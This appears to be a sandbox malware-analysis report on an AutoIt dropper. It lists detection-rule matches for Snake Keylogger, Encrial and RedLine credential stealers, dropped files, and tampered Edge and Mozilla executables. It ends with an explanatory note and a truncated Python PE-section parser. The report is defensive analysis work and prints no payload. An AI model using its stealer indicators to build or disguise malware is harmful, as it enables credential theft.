                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_0048CABC

                  System Summary

                  Source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 4.2.differences.exe.3ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.differences.exe.3ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000C.00000002.1924522530.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000004.00000002.1762544925.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000A.00000002.1905647858.0000000004080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00403B3A: This is a third-party compiled AutoIt script.
Source: x.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: x.exe, 00000001.00000003.1735418066.0000000004153000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: x.exe, 00000001.00000003.1735418066.0000000004153000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: x.exe, 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: x.exe, 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0046A1EF: GetFullPathNameW, __swprintf, CreateDirectoryW, CreateFileW, _memset, _wcsncpy, DeviceIoControl, CloseHandle, RemoveDirectoryW, CloseHandle
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00458310: _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_004651BD: ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
(Note: the DuplicateTokenEx / LoadUserProfileW / CreateEnvironmentBlock / CreateProcessAsUserW sequence and the ExitWindowsEx / InitiateSystemShutdownExW / SetSystemPowerState group are the RunAs and Shutdown helpers of the AutoIt3 runtime that every compiled AutoIt script embeds, consistent with the "third-party compiled AutoIt script" string above. They document the interpreter's capabilities, not calls the embedded script is known to make.)
Source: C:\Windows\System32\alg.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\31d53b0537b9f482.bin
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0040E6A0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0042D975
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0040FCE0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_004221C5
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_004362D2
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_004803DA
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0043242E
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_004225FA
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0045E616
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_004166E1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0043878F
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00436844
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00480857
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00418808
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00468889
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0042CB21
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00436DB6
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00416F9E
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00413030
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0042F1D9
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00423187
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00401287
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00421484
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00415520
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00427696
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00415760
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00421978
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00439AB5
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0050FCC8
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00487DDB
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00421D90
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0042BDA6
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_0040DF00
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00413FE0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00AB00D9
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00A76EAF
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00A751EE
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00AAD580
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00AA3780
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00AAC7F0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00AB39A3
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00AA5980
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00A77B71
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00A77F80
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 1_2_00BF9650
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 4_2_009B6EAF
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 4_2_009E5980
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 4_2_009F39A3
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 4_2_009B51EE
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 4_2_009ED580
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 4_2_009B7F80
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 4_2_009E3780
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 4_2_009EC7F0
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 4_2_00A87FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_02762F26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_02761448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_02761438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_027611A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_02761198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_04EA8530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_04EAAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_04EAF510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_04EA8520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_04EAED79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_04EAB203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_04EA1E51
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 6_2_0099CA20
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 6_2_0099AA63
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 6_2_00998789
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 6_2_009BA810
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 6_2_009979F0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 6_2_009B92A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 6_2_009B93B0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 6_2_00997C00
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 6_2_009C2D40
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 6_2_009BEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 7_2_022A92A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 7_2_022AEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 7_2_022A93B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 7_2_02287C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 7_2_022AA810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 7_2_022B2D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 7_2_022879F0
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 10_2_00A939A3
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 10_2_00A85980
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 10_2_00A56EAF
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 10_2_00A551EE
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 10_2_00A8D580
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 10_2_00A57F80
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 10_2_00A83780
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 10_2_00A8C7F0
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 10_2_00D38458
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 12_2_00B839A3
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 12_2_00B46EAF
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 12_2_00B75980
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 12_2_00B451EE
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 12_2_00B7D580
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 12_2_00B47F80
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 12_2_00B73780
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 12_2_00B7C7F0
Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | Code function: 12_2_00CE8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_02BC2F26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_02BC1438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_02BC1448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_02BC11A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_02BC1198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_053C8530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_053CAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_053CF730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_053CB210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_053C8520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_053CED78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_053CED88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_053CF510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_053CB18D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_053CB203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_053C1E51
Source: C:\Windows\System32\AppVClient.exe | Code function: 20_2_006B7C00
Source: C:\Windows\System32\AppVClient.exe | Code function: 20_2_006DA810
Source: C:\Windows\System32\AppVClient.exe | Code function: 20_2_006E2D40
Source: C:\Windows\System32\AppVClient.exe | Code function: 20_2_006B79F0
Source: C:\Windows\System32\AppVClient.exe | Code function: 20_2_006D92A0
Source: C:\Windows\System32\AppVClient.exe | Code function: 20_2_006DEEB0
Source: C:\Windows\System32\AppVClient.exe | Code function: 20_2_006D93B0
Source: C:\Windows\System32\FXSSVC.exe | Code function: 23_2_008C7C00
Source: C:\Windows\System32\FXSSVC.exe | Code function: 23_2_008EA810
Source: C:\Windows\System32\FXSSVC.exe | Code function: 23_2_008C79F0
Source: C:\Windows\System32\FXSSVC.exe | Code function: 23_2_008F2D40
Source: C:\Windows\System32\FXSSVC.exe | Code function: 23_2_008E92A0
Source: C:\Windows\System32\FXSSVC.exe | Code function: 23_2_008EEEB0
Source: C:\Windows\System32\FXSSVC.exe | Code function: 23_2_008E93B0
Source: C:\Windows\System32\msdtc.exe | Code function: 24_2_0074A810
Source: C:\Windows\System32\msdtc.exe | Code function: 24_2_00727C00
Source: C:\Windows\System32\msdtc.exe | Code function: 24_2_00752D40
Source: C:\Windows\System32\msdtc.exe | Code function: 24_2_007279F0
Source: C:\Windows\System32\msdtc.exe | Code function: 24_2_0074EEB0
Source: C:\Windows\System32\msdtc.exe | Code function: 24_2_007492A0
Source: C:\Windows\System32\msdtc.exe | Code function: 24_2_007493B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Load Driver
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Security
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0040E1D8 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 00428900 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 00420AE3 appears 70 times
Source: Acrobat.exe.3.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.3.dr | Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: SingleClientServicesUpdater.exe0.3.dr | Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: OneDriveSetup.exe.3.dr | Static PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 47694794 bytes, 767 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 6100 datablocks, 0x1503 compression
Source: Acrobat.exe0.3.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: identity_helper.exe.3.dr | Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.3.dr | Static PE information: Number of sections : 11 > 10
Source: msedge_proxy.exe0.3.dr | Static PE information: Number of sections : 12 > 10
Source: notification_click_helper.exe.3.dr | Static PE information: Number of sections : 13 > 10
Source: pwahelper.exe0.3.dr | Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.3.dr | Static PE information: Number of sections : 12 > 10
Source: setup.exe.3.dr | Static PE information: Number of sections : 13 > 10
Source: elevation_service.exe.3.dr | Static PE information: Number of sections : 12 > 10
Source: msedgewebview2.exe.3.dr | Static PE information: Number of sections : 14 > 10
Source: pwahelper.exe.3.dr | Static PE information: Number of sections : 12 > 10
Source: msedge_pwa_launcher.exe.3.dr | Static PE information: Number of sections : 13 > 10
Source: elevation_service.exe0.3.dr | Static PE information: Number of sections : 12 > 10
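The "Number of sections : N > 10" hits above come from a purely static check on the COFF file header. The following is an added example, not part of the report or of any tool it names, showing where that field lives and how the heuristic is applied; the PE image it parses is a constructed minimal header (DOS stub, COFF header with SizeOfOptionalHeader set to 0, and zero-filled section headers) built by build_min_pe(), which a real loader would reject but which lays the fields out exactly as a real file does. Note that every file flagged here is a Microsoft Edge component (elevation_service.exe, msedge_proxy.exe, msedgewebview2.exe and the others), and Chromium-based binaries routinely carry 11 to 14 sections, so this heuristic on its own is a weak signal; it gains weight only in combination with the infection-related signatures elsewhere in the report.

```python
"""Apply the 'Number of sections > 10' PE heuristic and list section names.

Added example, not from the report. build_min_pe() constructs a minimal PE
header for demonstration; it is not one of the dropped files.
"""
import struct

SECTION_LIMIT = 10  # threshold the report's heuristic uses


def pe_sections(data: bytes) -> list:
    """Return the section names of a PE image, reading only the headers."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of 'PE\0\0'
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF file header (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _machine, nsections, _ts, _psym, _nsym, opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size  # section table follows the optional header
    names = []
    for i in range(nsections):
        off = table + 40 * i  # IMAGE_SECTION_HEADER is 40 bytes; name is the first 8
        if off + 40 > len(data):
            raise ValueError("section table truncated")
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def flag_many_sections(data: bytes, limit: int = SECTION_LIMIT):
    """Return (section_count, fired) for the 'Number of sections > limit' check."""
    n = len(pe_sections(data))
    return n, n > limit


def build_min_pe(names) -> bytes:
    """Constructed sample: DOS header with e_lfanew = 0x40, COFF header with
    SizeOfOptionalHeader = 0, then one zero-filled section header per name."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, 0, 0x0102)
    table = b"".join(
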